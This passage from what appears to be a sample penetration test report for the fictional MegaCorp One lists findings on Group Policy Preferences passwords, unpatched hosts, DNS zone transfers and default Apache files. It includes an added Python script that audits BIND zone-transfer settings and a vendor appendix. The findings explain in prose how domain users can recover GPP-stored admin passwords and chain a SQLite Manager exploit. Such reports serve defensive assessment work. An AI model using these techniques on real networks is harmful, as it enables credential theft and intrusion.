Remediation: It is highly recommended to disable all local administrator accounts. In cases where a local administrative account is necessary, it should be assigned a unique name and a complex random password. The Group Policy Preferences mechanism used to set the password should not be used to distribute it at all: as shown in the attack narrative (Figures 17 to 19), the value is stored in SYSVOL, readable by every domain user, and encrypted with a key Microsoft has published, so any domain user can recover it.

Patch Management

Rating: High

Description: MegaCorp One's external and internal environments contain a number of unpatched systems and applications.

Impact: A combination of weak authentication and unpatched hosts, which contain known vulnerabilities with publicly available exploits, allows an attacker to gain unauthorized access to a large number of MegaCorp One's assets. Specifically, the discovered instance of SQLite Manager is vulnerable to a remote code execution vulnerability, and the underlying host also contains a local privilege escalation vulnerability, which can easily be leveraged to compromise the externally exposed host entirely. This appears to be an indication of an insufficient patch management policy and its implementation.

Remediation: All corporate assets should be kept current with the latest vendor-supplied security patches. This can be achieved with vendor-native tools or third-party applications, which can provide an overview of all missing patches. In many instances, third-party tools can also be used for patch deployment throughout a heterogeneous environment.

DNS Zone Transfer

Rating: Low

Description: A misconfigured DNS server allows unrestricted zone transfers.

Impact: A DNS server which is configured to allow zone transfers to any DNS server can provide sensitive information about corporate assets and network layouts.

Remediation: DNS zone transfers should be restricted only to pre-approved servers.

Default Apache Files

Rating: Low

Description: Default Apache files were discovered on the admin.megacorpone.com host.

Impact: An attacker may be able to guess the exact version of the running Apache server by inspecting the contents of the default files. Additional sensitive information may also be available.

Remediation: Remove all default files from publicly accessible web servers.
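The zone-transfer remediation above, as an added example that is not part of the report: a small audit of BIND named.conf text that reports zones whose effective allow-transfer ACL lets any host pull the zone, with the permissive setting beside a corrected one. The configuration fragments are constructed and 192.0.2.53 is a placeholder secondary address.

```python
import re

# Constructed named.conf fragments, not taken from the report: the permissive
# setting the finding describes beside a corrected one. 192.0.2.53 is a placeholder.
WEAK_CONF = """
options {
    allow-transfer { any; };
};
zone "megacorpone.com" IN {
    type master;
};
"""
FIXED_CONF = """
options {
    allow-transfer { none; };          // deny transfers unless a zone says otherwise
};
zone "megacorpone.com" IN {
    type master;
    allow-transfer { 192.0.2.53; };    // only the pre-approved secondary
};
"""
ZONE_RE = re.compile(r'^\s*zone\s+"([^"]+)"[^{]*\{', re.M)
OPTIONS_RE = re.compile(r'^\s*options\s*\{', re.M)


def _body(conf, open_idx):  # text inside the block opening at open_idx; braces in comments are not handled
    depth = 0
    for i in range(open_idx, len(conf)):
        depth += {"{": 1, "}": -1}.get(conf[i], 0)
        if depth == 0:
            return conf[open_idx + 1:i]
    raise ValueError("unbalanced braces")


def _allow_transfer(body):  # ACL entries of the allow-transfer statement, or None when absent
    m = re.search(r"allow-transfer\s*\{([^}]*)\}", body)
    return None if m is None else [t.strip() for t in m.group(1).split(";") if t.strip()]


def audit_zone_transfers(conf):
    """Map each zone to its effective ACL: the zone's own statement, else the options default."""
    m = OPTIONS_RE.search(conf)
    global_acl = _allow_transfer(_body(conf, m.end() - 1)) if m else None
    zones = {}
    for m in ZONE_RE.finditer(conf):
        acl = _allow_transfer(_body(conf, m.end() - 1))
        zones[m.group(1)] = global_acl if acl is None else acl
    return zones


def unrestricted_zones(conf):
    """Zones any host may pull; an unset ACL is treated as permissive (assumption: BIND's historical default)."""
    return sorted(z for z, acl in audit_zone_transfers(conf).items() if acl is None or "any" in acl)
```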

Appendix B: About Offensive Security

Offensive Security advocates penetration testing for impact as opposed to penetration testing for coverage. Penetration testing for coverage has risen in popularity in recent years as a simplified method of assessment used in situations where the goal is to meet regulatory needs. As a form of vulnerability scanning, penetration testing for coverage includes selective verification of discovered issues through exploitation. This allows service providers to conduct the work largely through the use of automated toolsets and maintain consistency of product across multiple engagements.

Penetration testing for impact is a form of attack simulation under controlled conditions, which closely mimics the real-world, targeted attacks that organizations face on a day-to-day basis. Penetration testing for impact is a goal-based assessment, which creates more than a simple vulnerability inventory, instead providing the true business impact of a breach. An impact-based penetration test identifies areas for improvement that will result in the highest rate of return for the business. Penetration testing for impact poses the challenge of requiring a high skillset to successfully complete. As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver world-class results when conducting penetration tests for impact, due to the level of expertise found within our team of security professionals. Offensive Security does not maintain a separate team for penetration testing and other activities that the company is engaged in.

This means that the same individuals that are involved in Offensive Security's industry-leading performance-based training, the production of industry-standard tools such as Kali Linux, authors of best-selling books, creators of 0-day exploits, and maintainers of industry references such as Exploit-DB are the same individuals that are involved in the delivery of services. Offensive Security offers a product that cannot be matched in the market. However, we may not be the right fit for every job. Offensive Security typically conducts consulting services with a low volume, high skill ratio to allow Offensive Security staff to more closely mimic real-world situations. This also allows customers to have increased access to industry-recognized expertise all while keeping costs reasonable. As such, high volume/fast turn-around engagements are often not a good fit for our services. Offensive Security is focused on conducting high quality, high impact assessments and is actively sought out by customers in need of services that cannot be delivered by other vendors.

If you would like to discuss your penetration testing needs, please contact us at [email protected].
